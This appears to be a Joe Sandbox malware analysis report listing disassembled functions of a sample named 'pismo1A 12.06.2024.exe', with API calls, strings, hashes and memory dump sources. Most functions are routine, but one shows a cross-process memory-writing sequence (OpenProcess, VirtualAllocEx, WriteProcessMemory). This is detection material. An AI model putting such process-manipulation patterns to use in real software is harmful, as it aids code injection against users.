Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: e586688b982cc5b4c03d397a77e37688e58d16fe8e598b88f13ad167e6adb84f
Instruction ID: b03e19bfc15da9bf7fb53ed1696616d69ed52d751011f21a1154d94c80cf6603
Opcode Fuzzy Hash: e586688b982cc5b4c03d397a77e37688e58d16fe8e598b88f13ad167e6adb84f
Instruction Fuzzy Hash: F5016276600214FFEB118F69DC48BAA7AEDEF44762F148224F905E6250DB79DE409BA0

Function 0070E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0070E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0070E9A5
Sleep.KERNEL32(00000000), ref: 0070E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0070E9B7
Sleep.KERNEL32 ref: 0070E9F3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 1c866707b28e5d78e19bab7748b92478cbbbaa50876aef08a02bb79d9f5d2bbb
Instruction ID: 22d8a1b6e0f8b59b947d74176f5d5dfe5c23966812c1b01403f5ffd1f94a1992
Opcode Fuzzy Hash: 1c866707b28e5d78e19bab7748b92478cbbbaa50876aef08a02bb79d9f5d2bbb
Instruction Fuzzy Hash: 65019271C1162DDBDF009FE5DC596DDBBB8FF08302F004A46E502B2191DB38A550D7A6

Function 007010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: adbc4afb0a3c26a321676fea66d31fd298bfc62be6ad708ac589f3c430181e3b
Instruction ID: eecebe33a0fa503603399d8bc556fa353fecf2d183cc62bb50cefd3f8708e0a8
Opcode Fuzzy Hash: adbc4afb0a3c26a321676fea66d31fd298bfc62be6ad708ac589f3c430181e3b
Instruction Fuzzy Hash: 95018175100209FFEB164F68DC49E6A3FAEEF85361B104414FA41D3350DB35DC009B60

Function 00700FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00700FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00700FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00700FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00700FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00701002

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 108156d75025e8ae24428cb0246d8b13cbf64cfdd290de519dbbd0e629bae011
Instruction ID: 644e6f7c5f62c1686e942a629eaf652fe2ac3b36f548b5d79626ff5dbe5b2ea7
Opcode Fuzzy Hash: 108156d75025e8ae24428cb0246d8b13cbf64cfdd290de519dbbd0e629bae011
Instruction Fuzzy Hash: 0BF06D75200305EBEB224FA4DC4EF563BADEF89762F508414FA85E7291CA79DC508B60

Function 00701014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0070102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00701036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0070104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701062

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f8c35013a3765e34fab2ae37f9f03e92aa527f935161fc96d58571e05e4c004a
Instruction ID: 7128f9a7466fda5ca06938ae6da154ac53c9828eb8b5caba5b88b7df041ce3fe
Opcode Fuzzy Hash: f8c35013a3765e34fab2ae37f9f03e92aa527f935161fc96d58571e05e4c004a
Instruction Fuzzy Hash: F0F06D75300305EBEB225FA4EC49F563BADEF89762F504414FA85E7290CA79DC508B60

Function 0071030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710324
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710331
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 0071033E
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 0071034B
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710358
CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710365

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8736158a8a4f3617b53a2584d12bc8eb98337e29f324d569473944926ce1c5e0
Instruction ID: 310a2a9894c9798cb31910b1b0255038d3e55aa540bfb0810e3a76cdbf634e86
Opcode Fuzzy Hash: 8736158a8a4f3617b53a2584d12bc8eb98337e29f324d569473944926ce1c5e0
Instruction Fuzzy Hash: D901AE72800B159FCB30AF6AD880852FBF9BF603153158A3FD1A652971C3B5A999DF80

Function 006DD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006DD752

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006DD764
_free.LIBCMT ref: 006DD776
_free.LIBCMT ref: 006DD788
_free.LIBCMT ref: 006DD79A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ff96af869f18e3dd4f82b9c70df998a4d1b80513e304a724c65e58de7f4bef65
Instruction ID: a5ea2a6cd58a442d9232db41eb0056801a655f89681be5cb1cf2cefe745acfbb
Opcode Fuzzy Hash: ff96af869f18e3dd4f82b9c70df998a4d1b80513e304a724c65e58de7f4bef65
Instruction Fuzzy Hash: 92F06232D40305AB8662FB65F9D1C6A77DFBB54710B99484BF099DB701C734FC808A68

Function 00705C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00705C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00705C6F
MessageBeep.USER32(00000000), ref: 00705C87
KillTimer.USER32(?,0000040A), ref: 00705CA3
EndDialog.USER32(?,00000001), ref: 00705CBD

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 8a5cfe934ffd0fc62b1da91a24875d034e83a41d8f0b6112e2943405d0614041
Instruction ID: 91a2ea991110daf433254e3486f691e281b118fdb1c78f4e4a6537194e481190
Opcode Fuzzy Hash: 8a5cfe934ffd0fc62b1da91a24875d034e83a41d8f0b6112e2943405d0614041
Instruction Fuzzy Hash: C1016231500B05EBFB215B10DD4FFA77BB8BB00B06F045659A583B10E1DBF8A9848FA4

Function 006D22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006D22BE

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006D22D0
_free.LIBCMT ref: 006D22E3
_free.LIBCMT ref: 006D22F4
_free.LIBCMT ref: 006D2305

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c607da22cf200d97bb8f36867f762785852637c2b25c1a5020c333fec41120ea
Instruction ID: 5f0ce4150ffd0f53572a3cf7d4dbd5c1e938c9bc49884daa4707c3bf4c7a02f0
Opcode Fuzzy Hash: c607da22cf200d97bb8f36867f762785852637c2b25c1a5020c333fec41120ea
Instruction Fuzzy Hash: E3F05470D002128B8663BF69BC218583B66F728B90740850BF419D7372CB7C0591BFEC

Function 006B95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 006B95D4
StrokeAndFillPath.GDI32(?,?,006F71F7,00000000,?,?,?), ref: 006B95F0
SelectObject.GDI32(?,00000000), ref: 006B9603
DeleteObject.GDI32 ref: 006B9616
StrokePath.GDI32(?), ref: 006B9631

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e08f4d1529d81e02d7a66c827c06db80825e4e41a30f9383474ef1f6ed975e4b
Instruction ID: ce51949de5f6c586960b33109bc773b02f918099bd1aef26c0db31c67c917c94
Opcode Fuzzy Hash: e08f4d1529d81e02d7a66c827c06db80825e4e41a30f9383474ef1f6ed975e4b
Instruction Fuzzy Hash: 7FF03171005288DBE7265F59ED1C7A43F61A700366F44C214F659651F0D73895D2DF28

Function 006D0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 006D10F9
__freea.LIBCMT ref: 006D1117

Part of subcall function 006D1537: _free.LIBCMT ref: 006D154F

Strings

a/p, xrefs: 006D11DE
am/pm, xrefs: 006D117A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 803f110ad71ee28dd634f0b8203996b59bcb45075b2517c51da3c345c8489a36
Instruction ID: c8d8688af5626ee66aff780e38152c2b78fe662c22a4f9a8314d52846b9df4c3
Opcode Fuzzy Hash: 803f110ad71ee28dd634f0b8203996b59bcb45075b2517c51da3c345c8489a36
Instruction Fuzzy Hash: F3D1CD71D00206EADB289F68C855BFAB7B3EF07300F29415BE901AF751D6B59E81CB91

Function 007261D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 006C0242: EnterCriticalSection.KERNEL32(0077070C,00771884,?,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C024D
Part of subcall function 006C0242: LeaveCriticalSection.KERNEL32(0077070C,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C028A

Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9

__Init_thread_footer.LIBCMT ref: 00726238

Part of subcall function 006C01F8: EnterCriticalSection.KERNEL32(0077070C,?,?,006B8747,00772514), ref: 006C0202
Part of subcall function 006C01F8: LeaveCriticalSection.KERNEL32(0077070C,?,006B8747,00772514), ref: 006C0235

Part of subcall function 0071359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007135E4
Part of subcall function 0071359C: LoadStringW.USER32(00772390,?,00000FFF,?), ref: 0071360A

Strings

x#w, xrefs: 00726353
x#w, xrefs: 0072636F
x#w, xrefs: 0072633A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#w$x#w$x#w
API String ID: 1072379062-1925529421
Opcode ID: 8530b7ba57c5477882c5b09e3f9306ba17568ca275a3071ceaa2e96a7aa58c7e
Instruction ID: 8a339fa1d614bac7939eaeb06e289606699f9bd2775fbcc4252cd9639bcb12f8
Opcode Fuzzy Hash: 8530b7ba57c5477882c5b09e3f9306ba17568ca275a3071ceaa2e96a7aa58c7e
Instruction Fuzzy Hash: 2BC19E71A00115AFCB14EF58D890EBEB7BAFF49310F10806AF9559B291DB74EE51CB90

Function 006D8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 006D8B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 006D8B7A
__dosmaperr.LIBCMT ref: 006D8B81

Strings

.l, xrefs: 006D8A63

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .l
API String ID: 2434981716-3986846653
Opcode ID: 7c7e5fb048af6a11ad2491eab51904019cc891034b097bbacc532f142412fc42
Instruction ID: 7a74dd540b929326fcec394e0aa84d58c31daa39685244a762b0ac2bdb799845
Opcode Fuzzy Hash: 7c7e5fb048af6a11ad2491eab51904019cc891034b097bbacc532f142412fc42
Instruction Fuzzy Hash: 28415CB0E04185AFD7259F68C898ABD7FA7DB85304B2C819BF88587342DE358C029794

Function 00702716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0070B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007021D0,?,?,00000034,00000800,?,00000034), ref: 0070B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00702760

Part of subcall function 0070B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0070B3F8

Part of subcall function 0070B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0070B355
Part of subcall function 0070B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00702194,00000034,?,?,00001004,00000000,00000000), ref: 0070B365
Part of subcall function 0070B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00702194,00000034,?,?,00001004,00000000,00000000), ref: 0070B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007027CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0070281A

Strings

@, xrefs: 00702832

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: d341b315f3a70ddf64c3c30a66a4d88be15c14bfd0aacc435ce4a7939217116e
Instruction ID: 56e8c8a0aa023c20685a75325e92aef8b96279437651cd5518cad5095e7b518e
Opcode Fuzzy Hash: d341b315f3a70ddf64c3c30a66a4d88be15c14bfd0aacc435ce4a7939217116e
Instruction Fuzzy Hash: 67412976900218EFDB10DFA4C946AEEBBB8EB09300F108199FA55B7181DA746F45CBA0

Function 006D172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\pismo1A 12.06.2024.exe,00000104), ref: 006D1769
_free.LIBCMT ref: 006D1834
_free.LIBCMT ref: 006D183E

Strings

C:\Users\user\Desktop\pismo1A 12.06.2024.exe, xrefs: 006D1760, 006D1767, 006D1796, 006D17CE

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\pismo1A 12.06.2024.exe
API String ID: 2506810119-3980522207
Opcode ID: b9c5c4302d198ca1afb89806505c7799ee6253190c24b31b951795b6783fd032
Instruction ID: c3d232846637b2cf7c9fc2f92524bac1fa9342784e0e7dfc06d317facb0cd397
Opcode Fuzzy Hash: b9c5c4302d198ca1afb89806505c7799ee6253190c24b31b951795b6783fd032
Instruction Fuzzy Hash: A8318071E00218BBDB21DB99D885DDEBBFEEB86350B54416BF404DB321D6B08E41DB94

Function 0070C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0070C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0070C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00771990,01135538), ref: 0070C395

Strings

0, xrefs: 0070C2DF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: ef222650756722c2f147eb816ef4baa3b6401e9da11f9df8ac5d8c2115448ca3
Instruction ID: e163f0531d40c3ba53535d2f79db46afa1582ff19c672ee26cc1a05a133a3d68
Opcode Fuzzy Hash: ef222650756722c2f147eb816ef4baa3b6401e9da11f9df8ac5d8c2115448ca3
Instruction Fuzzy Hash: 6A418E31204301DFD721DF25D885B5AFBE4AF85320F148B1DF9A5972D2D778A904CB66

Function 00734416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0073CC08,00000000,?,?,?,?), ref: 007344AA
GetWindowLongW.USER32 ref: 007344C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007344D7

Strings

SysTreeView32, xrefs: 0073447C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
